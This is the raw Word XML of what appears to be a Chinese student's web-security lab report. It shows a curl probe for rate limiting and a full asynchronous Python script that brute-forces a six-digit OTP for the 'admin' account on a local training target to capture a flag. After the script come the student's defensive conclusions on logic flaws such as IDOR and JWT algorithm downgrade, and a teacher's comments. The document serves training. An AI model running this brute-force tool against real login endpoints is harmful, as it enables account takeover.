                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 30 次错误请求，确认没有 429 / 锁账 / CAPTCHA：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F183A18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6F797738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for i in $(seq 1 30); do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21DF8AA5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curl -s -o /dev/null -w '%{http_code} ' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D6939E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-X POST http://目标地址/verify \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE9C64E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-d "username=admin&amp;otp=$(printf '%06d' $i)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C6950C4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done; echo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F4C2C0B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 输出全是 401 → 直接上爆破</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08428EB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3. 命中信号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C69F1D2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失败：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>401 + body wrong otp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="076F025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成功：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/verify 返回 302 → /；follow_redirects 后 200 且 body 含 flag{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B9C9F4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所以判定条件就一行：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A856345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0A3E0870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if r.status_code == 200 and "flag{" in r.text.lower():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A2F5355">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480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print("HIT", otp); print(r.text)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06B4CC53">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D76C8A7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>脚本代码：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="349A3741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#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B468BB6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import atexit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C6A8973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import os</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC085B0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 36-logic-otp-no-limit  —  OTP 暴力枚举（无速率限制 / 无锁定）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD5B40F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 漏洞：6 位数字 OTP（10^6 空间）+ /verify 无失败计数 / 无 IP 限速 / 无 OTP 过期</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A699EDB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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7100179D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 用法：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B96DCFE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   python3 main.py                          # 默认：先试 424030（已知命中）→ 失败再随机扫</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A8D8F5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   python3 main.py --order seq              # 顺序 0 → 999999</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4998234B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   python3 main.py --order reverse          # 倒序 999999 → 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C8ECA7C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   python3 main.py --order rand --seed 42   # 自定义随机种子</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CFAF9DF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   python3 main.py --first 424030,123456    # 自定义优先尝试列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0350BF8D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#   python3 main.py --concurrency 300        # 自定义并发</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD1280A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import argparse, asyncio, httpx, random, re, time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F9DABB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59491345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os.environ["NO_PROXY"] = "*"  # 防止代理污染：脚本只访问 127.0.0.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63752803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208CF526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BASE = os.environ.get("GKD_URL") or ("http://127.0.0.1:34961")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA58885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USER = "admin"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B734EBB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TOTAL = 1_000_000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A00B70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DEFAULT_FIRST = [424030]   # 已知命中（本机首次跑出的 OTP），默认优先尝试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63E3A7AB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2FA43F1D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found = asyncio.Event()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B15F5E7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result = {}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24878BDE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7F0D7B2B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def build_order(mode: str, seed: int, first: list[int]) -&gt; list[int]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="433B1150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"""根据模式构造枚举序列；first 中的 OTP 会被前置（去重）"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C140B18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if mode == "seq":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37FA7A2D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base = list(range(TOTAL))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2DDDC0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elif mode == "reverse":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DA0DA94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base = list(range(TOTAL - 1, -1, -1))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EEE32B6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elif mode == "rand":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731C4CE0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base = list(range(TOTAL))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FBE28A2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random.Random(seed).shuffle(base)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D29A10C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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21142D2B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raise ValueError(f"unknown order mode: {mode}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E157C00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seen = set(first)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3942DA60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return list(first) + [x for x in base if x not in seen]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C06E90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755E7468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async def try_otp(client, sem, otp_int, counter):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A4C1C7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if found.is_set():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22AABCD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return</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B1B843D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otp = f"{otp_int:06d}"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39ACBC80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async with sem:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C85803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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AE538F1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r = await client.post(f"{BASE}/verify",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C644D3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                      data={"username": USER, "otp": otp},</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F4B333D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                      follow_redirects=True)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F963CE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except Exception:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4476BBF7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return</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A15BC50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counter[0] += 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EE60AC6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if counter[0] % 2000 == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A38333B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dt = time.time() - counter[1]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09124E74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print(f"[{counter[0]:&gt;7}] {dt:6.1f}s  rate={counter[0]/dt:5.0f}/s  try={otp}", flush=True)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E5880D3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if r.status_code == 200 and ("flag{" in r.text.lower() or "togogo" in r.text.lower()):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4452D97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result["otp"] = otp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396DC0FD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result["body"] = r.text</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42916F12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found.set()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605ED21D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30AF94CD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async def main(args):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AEC5663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first = [int(x) for x in args.first.split(",") if x.strip()] if args.first else list(DEFAULT_FIRST)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37BAEC9B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order = build_order(args.order, args.seed, first)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1913CB94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print(f"[*] mode={args.order} seed={args.seed} first={first} concurrency={args.concurrency}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2775BB5E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6AA1CD61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limits = httpx.Limits(max_connections=args.concurrency,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C50DFF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              max_keepalive_connections=args.concurrency)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25AD3637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sem = asyncio.Semaphore(args.concurrency)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01059EE5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counter = [0, time.time()]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FAD728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4C0FC637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async with httpx.AsyncClient(limits=limits, timeout=15) as client:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1434061F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# 先串行打 first 列表（命中通常 &lt; 0.5s 完成）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ADB9A72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for n in first:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45C0D052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if found.is_set():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1104A984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    break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE7EA9E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await try_otp(client, sem, n, counter)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E209C0C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if found.is_set():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340F3A86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print(f"[+] fast-path 命中 first={first}", flush=True)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4744E911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39AE0878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# 主枚举</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6487AE85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tasks = []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="443F16BB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for n in order[len(first):]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4357EBC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if found.is_set():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EFD4E6C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    break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B634E3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tasks.append(asyncio.create_task(try_otp(client, sem, n, counter)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4717D662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if len(tasks) &gt;= args.concurrency * 4:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7888596C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    _, pending = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21DB6CB0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    tasks = list(pending)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E55781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if tasks and not found.is_set():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5AD936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await asyncio.gather(*tasks, return_exceptions=True)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4BD571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2E482E63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if "otp" in result:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="222859BE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print(f"\n[+] HIT otp={result['otp']}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01079655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m = re.search(r"(TOGOGO-flag\{[^}]+\}|flag\{[^}]+\})", result["body"], re.I)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1EF93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if m:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4BB7FC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print(f"[+] FLAG = {m.group(1)}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09DDE6F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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F2A4EE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print(f"[+] BODY (first 500B):\n{result['body'][:500]}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17ADFEB7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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09116FD0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print("[-] 未命中（枚举完毕）")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CFB38AA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4CB9DFDC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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11CDD42A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p = argparse.ArgumentParser()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20510F8C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p.add_argument("--order", choices=["seq", "reverse", "rand"], default="seq",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CE41DA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       help="枚举顺序：seq=正序 / reverse=倒序 / rand=随机（默认）")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C139C9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p.add_argument("--seed", type=lambda x: int(x, 0), default=0xC0DE,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D2BBF3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       help="rand 模式的随机种子，默认 0xC0DE（与首次命中复现一致）")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D810A47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p.add_argument("--first", type=str, default=None,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A743E0E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               help=f"优先尝试的 OTP 列表，逗号分隔；默认 {DEFAULT_FIRST}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="187D6705">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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 xml:space="preserve">    p.add_argument("--concurrency", type=int, default=500, help="并发数（默认 200）")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B0F10A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>asyncio.run(main(p.parse_args()))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19CFB0A0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480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522BAE5C">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70D112A7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="仿宋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仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5274310" cy="1843405"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
                  <wp:docPr id="914162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1628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4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4B6FAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="87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418"/>
        <w:gridCol w:w="1276"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1420"/>
        <w:gridCol w:w="1559"/>
      </w:tblGrid>
      <w:tr w14:paraId="264B5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04" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:textDirection w:val="tbRlV"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4708205B">
            <w:pPr>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实训结论与心得</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6946" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
          </w:tcPr>
          <w:p w14:paraId="091F762B">
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="20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本次实训深度聚焦 Web 业务逻辑安全漏洞，通过六大实战任务，让我深刻认识到：有别于传统的底层注入类漏洞，业务逻辑隐患往往源于开发设计阶段的思维盲区，这促使我完成了从“代码级防御”到“业务级安全”的测试思维跃迁。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FAB8601">
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="20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在具体的实战演练中，我针对各类逻辑缺陷进行了深度剖析：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D05668">
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="20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权限控制与身份认证：通过 IDOR 水平越权与垂直权限绕过任务，我厘清了“认证”与“授权”的边界。登录仅代表身份有效，资源的访问必须依赖严格的归属校验。无论是防止自增 ID 枚举，还是统一封装权限校验中间件，都印证了“零信任”原则——绝不能依赖前端参数或路径隐藏作为安全屏障，所有后台接口必须强制进行角色与数据归属验证。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477B398A">
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="20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数据校验与边界防护：负数金额篡改漏洞是典型的边界值校验缺失。在涉及交易、库存等核心数值时，仅做类型转换远远不够，必须建立严格的上下限阈值，从根源上阻断负数或异常参数进入业务计算链路。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60EB3526">
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="20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凭证安全与算法加固：密码重置 Token 泄露与 JWT 算法降级任务，揭示了凭证流转中的致命隐患。高敏感凭证必须通过离线渠道下发，并遵循“短效、单次”原则；而在 JWT 的使用中，后端绝不能盲信客户端头部参数，必须强制锁定安全的签名算法（如 HS256），彻底封死 alg:none 等伪造身份的途径。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C88BC44">
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="20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接口防护与并发对抗：无限制 OTP 爆破让我意识到，验证码的安全性不在于位数，而在于防护体系的厚度。必须组合使用 IP 限速、账号锁定、短效过期及一次性销毁等多重机制，才能有效抵御自动化脚本的并发穷举。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EBAB72A">
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="20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实训总结与展望</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DFAB700">
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="20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此次实训让我彻底明白，Web 安全不仅是代码层面的修补，更是业务逻辑的严密闭环。在未来的开发与测试工作中，我将跳出常规扫描的局限，主动代入攻击者视角，将边界值测试、负向参数注入、权限链路验证及凭证传输审计纳入标准测试用例。通过预判潜在的业务逻辑缺陷，完善每一处接口校验，致力于构建真正坚固、立体的多层安全防护体系。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3BB4B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4" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="324D75ED">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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教</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60B1D592">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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师</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215B1F07">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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评</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC212FB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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语</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6946" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
          </w:tcPr>
          <w:p w14:paraId="684C2892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该生完成实训任务非常的出色表扬！</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BA002F4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该生在实训中表现优异，深入剖析了Web业务逻辑漏洞。能清晰区分认证与授权，精准掌握权限校验、边界防护及凭证安全机制。安全测试思维实现跃迁，具备从攻击者视角预判风险的能力，实训成果显著，望继续保持。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6955DA0E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14F1F572">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41C427E5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06C25534">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="135EECF2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="360C9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1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EF0EDE4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BE2FA61">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DAC17B4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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学生</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1273" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E1644A1">
            <w:pPr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李家雄</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3753D896">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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指导教师</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26A8D553">
            <w:pPr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318135" cy="509270"/>
                  <wp:effectExtent l="0" t="317" r="5397" b="5398"/>
                  <wp:docPr id="39" name="图片 39" descr="图片包含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图片包含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 flipH="1" flipV="1">
                            <a:off x="0" y="0"/>
                            <a:ext cx="345256" cy="553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A45F7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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var(--ty-font-text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B2E0C">
    <w:pPr>
      <w:pStyle w:val="5"/>
      <w:pBdr>
        <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
      </w:pBdr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="方正小标宋_GBK" w:eastAsia="方正小标宋_GBK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-167640</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2295525" cy="410845"/>
          <wp:effectExtent l="0" t="0" r="0" b="8890"/>
          <wp:wrapNone/>
          <wp:docPr id="1205963457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5963457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5525" cy="4106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column">
                <wp:posOffset>4078605</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-35560</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1943100" cy="1404620"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="217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74BC6757">
                          <w:pPr>
                            <w:rPr>
                              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"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hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                              <w:sz w:val="32"/>
                              <w:szCs w:val="36"/>
                            </w:rPr>
                            <w:t>实训报告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文本框 2" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:0pt;margin-left:321.15pt;margin-top:-2.8pt;height:110.6pt;width:153pt;z-index:251661312;mso-width-relative:page;mso-height-relative:margin;mso-height-percent:200;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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jOiXJ2AAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAA&#10;CACHTuJA2JkeKScCAAAsBAAADgAAAAAAAAABACAAAAAnAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAA&#10;AAYABgBZAQAAwAUAAAAA&#10;">
              <v:fill on="f" focussize="0,0"/>
              <v:stroke on="f" miterlimit="8" joinstyle="miter"/>
              <v:imagedata o:title=""/>
              <o:lock v:ext="edit" aspectratio="f"/>
              <v:textbox style="mso-fit-shape-to-text:t;">
                <w:txbxContent>
                  <w:p w14:paraId="74BC6757">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                        <w:sz w:val="32"/>
                        <w:szCs w:val="36"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                        <w:sz w:val="32"/>
                        <w:szCs w:val="36"/>
                      </w:rPr>
                      <w:t>实训报告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方正小标宋_GBK" w:eastAsia="方正小标宋_GBK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posOffset>313055</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>54610</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="5082540" cy="323850"/>
          <wp:effectExtent l="0" t="0" r="4445" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="37" name="图片 360" descr="说明: 说明: 背景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图片 360" descr="说明: 说明: 背景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955" t="3867" r="20895" b="93320"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="5087986" cy="32420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2px;height:2px" o:bullet="t">
        <v:imagedata r:id="rId1" o:title=""/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0">
    <w:nsid w:val="207C5A1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="207C5A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2352E4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42352E4D"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlPicBulletId w:val="0"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="440"/>
        </w:tabs>
        <w:ind w:left="440" w:firstLine="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880"/>
        </w:tabs>
